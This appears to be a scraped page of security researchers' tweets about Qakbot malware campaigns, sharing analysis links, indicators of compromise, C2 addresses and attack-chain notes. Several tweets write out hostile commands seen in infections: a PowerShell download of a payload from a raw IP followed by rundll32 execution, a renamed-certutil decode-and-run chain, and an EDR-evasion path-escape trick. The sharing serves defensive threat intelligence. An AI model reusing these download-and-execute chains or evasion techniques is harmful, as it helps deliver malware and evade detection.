Bhargav koduru(@brkoduru) 's Twitter Profile Photo

Here's my blog on malware with threat detections using

Qakbot seen in below campaigns:
⛔️OneNote Campaign
⛔️WSF Campaign
⛔️HTML Smuggling Campaign

Blog: research.loginsoft.com/threat-researc…

account_circle
Saharsh(@saharshtapi) 's Twitter Profile Photo

OneNote Malware Campaign Insights
Malware List:
1️⃣ Qakbot
2️⃣ Emotet
3️⃣ AgentTesla
4️⃣ IcedID
...
research.loginsoft.com/threat-researc…

account_circle
RussianPanda 🐼 🇺🇦(@AnFam17) 's Twitter Profile Photo

More spreading via 🦆
Registry: HKCU\\SOFTWARE\\anna\\nana\\nina
DLL execution: C:\\ProgramData\\1.png,Wind
Payload URL: hxxps://khatriassociates.com/MBt/3.gif
eSentire Threat Intel

More #qakbot spreading via #OneNote🦆
Registry: HKCU\\SOFTWARE\\anna\\nana\\nina
DLL execution: C:\\ProgramData\\1.png,Wind
Payload URL: hxxps://khatriassociates.com/MBt/3.gif
@esthreat
account_circle
vx-underground(@vxunderground) 's Twitter Profile Photo

We've updated the vx-underground malware sample collection.

- NokoyaRansomware
- QakBot
- Karma
- Conti
- Pysa
- LokiBot
- Industroyer
- PryntStealer
- BlackGuard
- Redline
- Certishell
- Emotet

Check it out here: samples.vx-underground.org/samples/Famili…

We've updated the vx-underground malware sample collection.

- NokoyaRansomware
- QakBot
- Karma
- Conti
- Pysa
- LokiBot
- Industroyer
- PryntStealer
- BlackGuard
- Redline
- Certishell
- Emotet

Check it out here: samples.vx-underground.org/samples/Famili…
account_circle
Max_Malyutin(@Max_Mal_) 's Twitter Profile Photo

Nasty Tricks Attempt to Bypass EDRs

[+] Multiply path escapes avoiding command-line detections:
xcopy C:\Windows\\\\\\system32\\\\\\wscript.exe %temp%\{*}.exe /h /s /e

[+] Masquerading:
Rename System Utilities T1036.003
Match Legitimate Name or Location T1036.005

account_circle
Malware Hunters(@_MalwareHunters) 's Twitter Profile Photo

🔥 Daily Indicators of Compromise ( ) are now available on the MalwareHunters.org platform in JSON and XLSX formats in the section with digital profiles of , and groups

📌 digital profile (example)

malwarehunters.org/infographics/m…

🔥 Daily Indicators of Compromise (#IoC) are now available on the MalwareHunters.org platform in JSON and XLSX formats in the section with digital profiles of #malware, #cybercrime and #APT groups

📌 #QakBot digital profile (example)

malwarehunters.org/infographics/m…

#iocs #infosec
account_circle
QuillBot(@TheQuillBot) 's Twitter Profile Photo

Write in clear, mistake-free English with QuillBot.

Join over 50+ million QuillBot users and see what better, clearer writing can do for you.

Try for Free Now!

account_circle
Matt Anderson(@nosecurething) 's Twitter Profile Photo

Renamed Windows Binaries in today's :
- cmd.exe
- wscript.exe
- reg.exe

B64 encoded PS includes exclusion for $currentdrive
Lots of tactics in the beginning of the attack chain.

Renamed Windows Binaries in today's #qakbot:
- cmd.exe
- wscript.exe
- reg.exe

B64 encoded PS includes exclusion for $currentdrive
Lots of #defenseevasion tactics in the beginning of the attack chain.
account_circle
Roland Zigerli(@BigZiii) 's Twitter Profile Photo

.FortiGuard Labs discovered a campaign spreading a new variant of the information stealer and banking Trojan .

Read our analysis blog to learn how the HTML file can lead to executing the QakBot variant, what actions it takes, and more: ftnt.net/6018PEE78

.@FortiGuardLabs discovered a #phishing campaign spreading a new variant of the information stealer and banking Trojan #QakBot. 

Read our analysis blog to learn how the HTML file can lead to executing the QakBot variant, what actions it takes, and more: ftnt.net/6018PEE78
account_circle
proxylife(@pr0xylife) 's Twitter Profile Photo

- BB15 - .one > .jse > .bat > .ps > .dll

WScript.exe Open.jse

cmd.exe /c default.bat

powershell iwr -uri http://104.236.1.43/YXF/150223.gif -o %temp%\aTgzWLspf.tmp

RunDLL32 %temp%\aTgzWLspf.tmp,Wind

IOC's
github.com/pr0xylife/Qakb…

#Qakbot - BB15 - .one > .jse > .bat > .ps > .dll

WScript.exe Open.jse

cmd.exe /c default.bat

powershell iwr -uri http://104.236.1.43/YXF/150223.gif -o %temp%\aTgzWLspf.tmp

RunDLL32 %temp%\aTgzWLspf.tmp,Wind

IOC's
github.com/pr0xylife/Qakb…
account_circle
C2IntelFeedsBot(@drb_ra) 's Twitter Profile Photo

(Unverified) Qakbot Found
C2: 81[.]150[.]169[.]174:2222
Country: United Kingdom (AS2856)
ASN: BT-UK-AS BTnet UK Regional network

account_circle
Matt Anderson(@nosecurething) 's Twitter Profile Photo

Looks like using renamed certutil to decode a text file to create the dll before running it.

zip ➡️ iso (~203MB) ➡️ cmd ➡️\vibrations\quitting.exe (certutil) -decode vibrations\competitively.sql c:\users\public\output2.txt ➡️rundll32 c:\users\public\output2.txt,N115

Looks like #qakbot using renamed certutil to decode a text file to create the dll before running it. 

zip ➡️ iso (~203MB) ➡️  cmd ➡️\vibrations\quitting.exe (certutil) -decode vibrations\competitively.sql c:\users\public\output2.txt ➡️rundll32  c:\users\public\output2.txt,N115
account_circle
0xToxin🕷️(@0xToxin) 's Twitter Profile Photo

devs got drunk.
A sample with malfunction powershell script , they tried to apply split on unsplitted fetching URL's 🤣

Triage:
tria.ge/230322-v3x72aa…

#QakBot devs got drunk.
A sample with malfunction powershell script , they tried to apply split on unsplitted fetching URL's 🤣

Triage: 
tria.ge/230322-v3x72aa…
account_circle
roubachof(@sdkddk) 's Twitter Profile Photo

Interesting fresh sample with lots of log messages. Version 404.447, campaign BB12, timestamp 2023-02-02 08:21:43.

virustotal.com/gui/file/232ec…

Interesting fresh #Qakbot sample with lots of log messages. Version 404.447, campaign BB12, timestamp 2023-02-02 08:21:43.

virustotal.com/gui/file/232ec…
account_circle
Ian Kenefick(@ian_kenefick) 's Twitter Profile Photo

Obama DLL distribution domains deployed last week but as yet, unused. You know what to do.

wewesuga[.]com
weswtef[.]com
utokra[.]com
ilapset[.]com
fikqso[.]com
deracak[.]com

account_circle